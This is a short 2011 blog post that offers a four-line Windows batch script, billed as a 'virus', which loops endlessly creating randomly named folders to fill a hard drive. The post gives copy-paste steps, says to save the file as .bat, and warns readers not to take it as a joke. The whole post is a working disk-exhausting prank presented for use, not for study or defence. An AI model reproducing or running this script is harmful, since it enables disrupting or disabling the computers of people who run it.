Tuesday, 6 September 2011

Create a Batch pro that makes an Infinite Folders in a Hard Drive

Have you heard? A virus that create thousands of thousands folder within hard drive, Yes here is that; I am going to give a batch programming code that make it possible. This just a batch commands that create folder in hard disk and waste the memory of hard disk that brings a time when your drive got full.
Follow these simple steps:

  • Copy and Paste below codes on Notepad.
                          @echo off
                           :top
                           md %random%
                          goto top

  • Save it as .bat.
Now it is ready to use, don’t take it as joke.


Related Posts:



0 comments:

Post a Comment